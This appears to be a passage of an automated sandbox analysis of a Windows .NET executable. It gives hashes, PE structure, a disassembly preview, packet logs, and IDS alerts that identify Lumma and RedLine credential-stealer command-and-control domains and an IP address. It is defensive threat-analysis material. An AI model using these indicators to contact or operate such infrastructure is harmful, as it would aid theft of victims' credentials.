                            Preview:.PNG........IHDR...@...@......iq.....IDATx.....e.._Osm...,uY.sYI.w.$..........:VjD..!...o%....5$......... (..;~8."......h...r.^/}...|..qm.O.w..I.m....>..y>.?_.....;_=.b.R4X..4.2....S!.P.m>......*`........@.....O...\,...o..@..RS.5.3.....M..@.....>..|....2p ......v...-a.9........V..0.X....`(.....TH.i....o:.....'p3.[.Lx.q.1.....XN/j.M...y..+....!r.P........F.6....M.W./".QK.....?...r....f.7.?...7..y@..-` ......f.7..x.......z-......u6D...M.=.6D....`X..>.......`....?..-....s..\..._...Vc.&......rzM...9B....dJp.......|....@..O....."je...oGL..1.......R!5\.Q.7.......Mb.x.x....)E.u.b9.Ad.<..x.8.L!...8...aV#..|>.R...9+.....P......~..^...;?.#q......d.G.a`..I...c9..\..Cc',.l.-.......m.H..E......s.s...:.l>....L....u...g#Q..0.<...3.~=b.....TH.....M......K..a..R48....W.[..6...?...3.)..r.WHd8...o(.^.....]..~.8ef49..F......d.QF.zg).,.#.E.-..q..L.....^.u.x.XY....,.......C.i=lJ..c.?.4E=@......Y.r...`......Z.8].....A../.R...5.-.YG1...b.....y..x.".'Y...b1.....K..$..">..

                            Chrome Cache Entry: 69

                            Download File
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                            Category:dropped
                            Size (bytes):2833
                            Entropy (8bit):7.876846206921263
                            Encrypted:false
                            SSDEEP:48:Kw15hc/Pj2itdgjeVVO/SzBdCvhaHAlJX7XnF/HDoSH8T78atjZeHMBx/F/WssM:J15hc/Pj2mdgjMjusgl5XFD3MoIx9eg
                            MD5:18C023BC439B446F91BF942270882422
                            SHA1:768D59E3085976DBA252232A65A4AF562675F782
                            SHA-256:E0E71ACEF1EFBFAB69A1A60CD8FADDED948D0E47A0A27C59A0BE7033F6A84482
                            SHA-512:A95AD7B48596BC0AF23D05D1E58681E5D65E707247F96C5BC088880F4525312A1834A89615A0E33AEA6B066793088A193EC29B5C96EA216F531C443487AE0735
                            Malicious:false
                            Preview:.PNG........IHDR...@...@......iq.....IDATx.....e.._Osm...,uY.sYI.w.$..........:VjD..!...o%....5$......... (..;~8."......h...r.^/}...|..qm.O.w..I.m....>..y>.?_.....;_=.b.R4X..4.2....S!.P.m>......*`........@.....O...\,...o..@..RS.5.3.....M..@.....>..|....2p ......v...-a.9........V..0.X....`(.....TH.i....o:.....'p3.[.Lx.q.1.....XN/j.M...y..+....!r.P........F.6....M.W./".QK.....?...r....f.7.?...7..y@..-` ......f.7..x.......z-......u6D...M.=.6D....`X..>.......`....?..-....s..\..._...Vc.&......rzM...9B....dJp.......|....@..O....."je...oGL..1.......R!5\.Q.7.......Mb.x.x....)E.u.b9.Ad.<..x.8.L!...8...aV#..|>.R...9+.....P......~..^...;?.#q......d.G.a`..I...c9..\..Cc',.l.-.......m.H..E......s.s...:.l>....L....u...g#Q..0.<...3.~=b.....TH.....M......K..a..R48....W.[..6...?...3.)..r.WHd8...o(.^.....]..~.8ef49..F......d.QF.zg).,.#.E.-..q..L.....^.u.x.XY....,.......C.i=lJ..c.?.4E=@......Y.r...`......Z.8].....A../.R...5.-.YG1...b.....y..x.".'Y...b1.....K..$..">..

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Entropy (8bit):5.028489272539632
                            TrID:
                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                            • Win32 Executable (generic) a (10002005/4) 49.78%
                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                            • Win16/32 Executable Delphi generic (2074/23) 0.01%
                            • Generic Win/DOS Executable (2004/3) 0.01%
                            File name:dlcdkJcbbV.exe
                            File size:304'128 bytes
                            MD5:9adc621f718c8e283e2b946acf914322
                            SHA1:13f01086a0878cd540112ddcef23133a117dc4c0
                            SHA256:2ff2f5480438c7d7648625cc56c8982880d678f565267d83d48dde4043c059d7
                            SHA512:bc14841ff0a207205449ac8d98c48425b11c7de9099167b5fc7ddb4cd5c0ff9dac5b146b042c9a29d34116f4747f37e98c8c91d9f25923f1a75ebf1499825cf0
                            SSDEEP:3072:6qFFrqwIOG9jyZEGRL78+XwR3zdpk4sNMhdVSTZ/fHZ3cZqf7D34deqiOLCbBOT:5BIOGsjwiNqdETZ3VcZqf7DInL
                            TLSH:5E545C1873E88911E57F4B79D470D67093B0EC12A853E31A5FD0ACAB3D77B80EA156B2
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...!'t...............0.................. ........@.. ....................................@................................

                            File Icon

                            Icon Hash:4d8ea38d85a38e6d

                            Static PE Info

                            General

                            Entrypoint:0x429fd2
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Time Stamp:0xEF742721 [Sun Apr 21 07:13:37 2097 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                            Entrypoint Preview

                            Instruction
                            jmp dword ptr [00402000h]
                            popad
                            add byte ptr [ebp+00h], dh
                            je 00007F70BCEFDBD2h
                            outsd
                            add byte ptr [esi+00h], ah
                            imul eax, dword ptr [eax], 006C006Ch
                            xor eax, 59007400h
                            add byte ptr [edi+00h], dl
                            push edx
                            add byte ptr [ecx+00h], dh
                            popad
                            add byte ptr [edi+00h], dl
                            push esi
                            add byte ptr [edi+00h], ch
                            popad
                            add byte ptr [ebp+00h], ch
                            push 61006800h
                            add byte ptr [ebp+00h], ch
                            dec edx
                            add byte ptr [eax], bh
                            add byte ptr [edi+00h], dl
                            push edi
                            add byte ptr [ecx], bh
                            add byte ptr [ecx+00h], bh
                            bound eax, dword ptr [eax]
                            xor al, byte ptr [eax]
                            insb
                            add byte ptr [eax+00h], bl
                            pop ecx
                            add byte ptr [edi+00h], dl
                            js 00007F70BCEFDBD2h
                            jnc 00007F70BCEFDBD2h
                            pop edx
                            add byte ptr [eax+00h], bl
                            push ecx
                            add byte ptr [ebx+00h], cl
                            popad
                            add byte ptr [edi+00h], dl
                            dec edx
                            add byte ptr [ebp+00h], dh
                            pop edx
                            add byte ptr [edi+00h], dl
                            jo 00007F70BCEFDBD2h
                            imul eax, dword ptr [eax], 5Ah
                            add byte ptr [ebp+00h], ch
                            jo 00007F70BCEFDBD2h
                            je 00007F70BCEFDBD2h
                            bound eax, dword ptr [eax]
                            push edi
                            add byte ptr [eax+eax+77h], dh
                            add byte ptr [ecx+00h], bl
                            xor al, byte ptr [eax]
                            xor eax, 63007300h
                            add byte ptr [edi+00h], al
                            push esi
                            add byte ptr [ecx+00h], ch
                            popad
                            add byte ptr [edx], dh
                            add byte ptr [eax+00h], bh
                            je 00007F70BCEFDBD2h
                            bound eax, dword ptr [eax]
                            insd
                            add byte ptr [eax+eax+76h], dh
                            add byte ptr [edx+00h], bl
                            push edi
                            add byte ptr [ecx], bh
                            add byte ptr [eax+00h], dh
                            popad
                            add byte ptr [edi+00h], al
                            cmp dword ptr [eax], eax
                            insd
                            add byte ptr [edx+00h], bl
                            push edi
                            add byte ptr [esi+00h], cl
                            cmp byte ptr [eax], al
                            push esi
                            add byte ptr [eax+00h], cl
                            dec edx
                            add byte ptr [esi+00h], dh
                            bound eax, dword ptr [eax]
                            insd
                            add byte ptr [eax+00h], bh
                            jo 00007F70BCEFDBD2h
                            bound eax, dword ptr [eax]
                            insd
                            add byte ptr [ebx+00h], dh

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x29f800x4f.text
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x300000x1c9cc.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x4e0000xc.reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x29f640x1c.text
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x20000x2cfb80x2d000e7c3166b93842b388aec136b12ba3a89False0.4618109809027778data6.166230814805243IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rsrc0x300000x1c9cc0x1cc0097e6d03bcf780904dffc3845d9119d6cFalse0.23727921195652174data2.6061811115892146IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .reloc0x4e0000xc0x400144c5224df24592ae5ef58508d132b4cFalse0.025390625data0.05585530805374581IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                            Resources

                            NameRVASizeTypeLanguageCountryZLIB Complexity
                            RT_ICON0x301a00x3d04PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9934058898847631
                            RT_ICON0x33eb40x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2835 x 2835 px/m0.09013072282030049
                            RT_ICON0x446ec0x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2835 x 2835 px/m0.13905290505432216
                            RT_ICON0x489240x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2835 x 2835 px/m0.17033195020746889
                            RT_ICON0x4aedc0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/m0.2045028142589118
                            RT_ICON0x4bf940x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2835 x 2835 px/m0.24645390070921985
                            RT_GROUP_ICON0x4c40c0x5adata0.7666666666666667
                            RT_VERSION0x4c4780x352data0.44588235294117645
                            RT_MANIFEST0x4c7dc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                            Imports

                            DLLImport
                            mscoree.dll_CorExeMain

                            Network Behavior

                            Snort IDS Alerts

                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                            07/08/24-10:09:54.549288TCP2054183ET TROJAN Observed Lumma Stealer Related Domain (potterryisiw .shop in TLS SNI)49741443192.168.2.12188.114.96.3
                            07/08/24-10:09:53.035633TCP2054183ET TROJAN Observed Lumma Stealer Related Domain (potterryisiw .shop in TLS SNI)49740443192.168.2.12188.114.96.3
                            07/08/24-10:09:48.653781TCP2054183ET TROJAN Observed Lumma Stealer Related Domain (potterryisiw .shop in TLS SNI)49736443192.168.2.12188.114.96.3
                            07/08/24-10:09:48.632971UDP2054182ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (potterryisiw .shop)6387253192.168.2.121.1.1.1
                            07/08/24-10:09:48.621940UDP2053384ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (willingyhollowsk .shop)5890253192.168.2.121.1.1.1
                            07/08/24-10:09:56.210269TCP2054183ET TROJAN Observed Lumma Stealer Related Domain (potterryisiw .shop in TLS SNI)49742443192.168.2.12188.114.96.3
                            07/08/24-10:09:58.735485TCP2054183ET TROJAN Observed Lumma Stealer Related Domain (potterryisiw .shop in TLS SNI)49745443192.168.2.12188.114.96.3
                            07/08/24-10:09:15.749307TCP2046056ET TROJAN Redline Stealer/MetaStealer Family Activity (Response)4096049710185.215.113.67192.168.2.12
                            07/08/24-10:09:10.202750TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)4971040960192.168.2.12185.215.113.67
                            07/08/24-10:09:32.567923TCP2043231ET TROJAN Redline Stealer TCP CnC Activity4971040960192.168.2.12185.215.113.67
                            07/08/24-10:09:51.932584TCP2054183ET TROJAN Observed Lumma Stealer Related Domain (potterryisiw .shop in TLS SNI)49739443192.168.2.12188.114.96.3
                            07/08/24-10:09:50.780898TCP2054183ET TROJAN Observed Lumma Stealer Related Domain (potterryisiw .shop in TLS SNI)49738443192.168.2.12188.114.96.3
                            07/08/24-10:09:49.557986TCP2054183ET TROJAN Observed Lumma Stealer Related Domain (potterryisiw .shop in TLS SNI)49737443192.168.2.12188.114.96.3
                            07/08/24-10:09:10.446155TCP2043234ET MALWARE Redline Stealer TCP CnC - Id1Response4096049710185.215.113.67192.168.2.12

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Jul 8, 2024 10:09:05.023619890 CEST49709443192.168.2.1240.113.110.67
                            Jul 8, 2024 10:09:05.023660898 CEST4434970940.113.110.67192.168.2.12
                            Jul 8, 2024 10:09:05.023749113 CEST49709443192.168.2.1240.113.110.67
                            Jul 8, 2024 10:09:05.024394035 CEST49709443192.168.2.1240.113.110.67
                            Jul 8, 2024 10:09:05.024409056 CEST4434970940.113.110.67192.168.2.12
                            Jul 8, 2024 10:09:05.824657917 CEST4434970940.113.110.67192.168.2.12
                            Jul 8, 2024 10:09:05.824886084 CEST49709443192.168.2.1240.113.110.67
                            Jul 8, 2024 10:09:05.834531069 CEST49709443192.168.2.1240.113.110.67
                            Jul 8, 2024 10:09:05.834554911 CEST4434970940.113.110.67192.168.2.12
                            Jul 8, 2024 10:09:05.834907055 CEST4434970940.113.110.67192.168.2.12
                            Jul 8, 2024 10:09:05.836142063 CEST49709443192.168.2.1240.113.110.67
                            Jul 8, 2024 10:09:05.836208105 CEST49709443192.168.2.1240.113.110.67
                            Jul 8, 2024 10:09:05.836215973 CEST4434970940.113.110.67192.168.2.12
                            Jul 8, 2024 10:09:05.836347103 CEST49709443192.168.2.1240.113.110.67
                            Jul 8, 2024 10:09:05.880511999 CEST4434970940.113.110.67192.168.2.12
                            Jul 8, 2024 10:09:06.008698940 CEST4434970940.113.110.67192.168.2.12
                            Jul 8, 2024 10:09:06.008786917 CEST4434970940.113.110.67192.168.2.12
                            Jul 8, 2024 10:09:06.008842945 CEST49709443192.168.2.1240.113.110.67
                            Jul 8, 2024 10:09:06.009056091 CEST49709443192.168.2.1240.113.110.67
                            Jul 8, 2024 10:09:06.009084940 CEST4434970940.113.110.67192.168.2.12
                            Jul 8, 2024 10:09:06.622611046 CEST49673443192.168.2.12173.222.162.60
                            Jul 8, 2024 10:09:06.622972965 CEST49674443192.168.2.12173.222.162.60
                            Jul 8, 2024 10:09:07.075764894 CEST49672443192.168.2.12173.222.162.60
                            Jul 8, 2024 10:09:09.406877041 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:09.411819935 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:09.412010908 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:09.421072960 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:09.426043987 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:10.171624899 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:10.202749968 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:10.207653999 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:10.446155071 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:10.497653008 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:15.502315044 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:15.507391930 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:15.749306917 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:15.749320984 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:15.749335051 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:15.749341965 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:15.749347925 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:15.749355078 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:15.749393940 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:15.749433994 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:15.896660089 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:15.950719118 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:16.058887959 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:16.063946009 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:16.232014894 CEST49673443192.168.2.12173.222.162.60
                            Jul 8, 2024 10:09:16.232053995 CEST49674443192.168.2.12173.222.162.60
                            Jul 8, 2024 10:09:16.303492069 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:16.357006073 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:16.368402004 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:16.373372078 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:16.373424053 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:16.373464108 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:16.373481989 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:16.373491049 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:16.373497009 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:16.373518944 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:16.373523951 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:16.373547077 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:16.373574018 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:16.373579979 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:16.373648882 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:16.373653889 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:16.378619909 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:16.378624916 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:16.378637075 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:16.378710985 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:16.378715992 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:16.378726959 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:16.685158014 CEST49672443192.168.2.12173.222.162.60
                            Jul 8, 2024 10:09:16.802098036 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:16.841381073 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:16.980585098 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:16.985460997 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:17.429172993 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:17.438425064 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:17.443393946 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:17.681979895 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:17.707834005 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:17.714462996 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:17.953800917 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:17.997628927 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.002244949 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.007725954 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.246228933 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.294533014 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.333503008 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.339521885 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.339535952 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.339545965 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.339643002 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.339674950 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.339687109 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.339698076 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.339708090 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.339716911 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.339735985 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.339770079 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.339821100 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.339842081 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.339864969 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.339881897 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.346398115 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.346474886 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.346683979 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.346693993 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.346710920 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.346735001 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.346755028 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.346838951 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.346849918 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.346894026 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.346949100 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.346961021 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.346973896 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.347022057 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.347096920 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.347107887 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.347117901 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.347142935 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.347155094 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.351449013 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.351473093 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.351520061 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.351525068 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.351536036 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.351566076 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.351577044 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.351594925 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.351634979 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.351643085 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.351645947 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.351658106 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.351676941 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.351680040 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.351686954 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.351697922 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.351701021 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.351711988 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.351728916 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.351778984 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.351788998 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.351798058 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.351810932 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.351819992 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.351886034 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.351896048 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.352005005 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.352015972 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.352025986 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.352077007 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.352102041 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.352113008 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.352123022 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.352133036 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.352143049 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.352147102 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.352153063 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.352163076 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.352164030 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.352190971 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.352201939 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.352212906 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.352222919 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.352236986 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.352247000 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.352258921 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.352260113 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.352271080 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.352272987 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.352281094 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.352283955 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.352291107 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.352300882 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.352328062 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.352340937 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.352351904 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.352360964 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.352386951 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.352396965 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.356251001 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.356262922 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.356276035 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.356295109 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.356312990 CEST4096049710185.215.113.67192.168.2.12
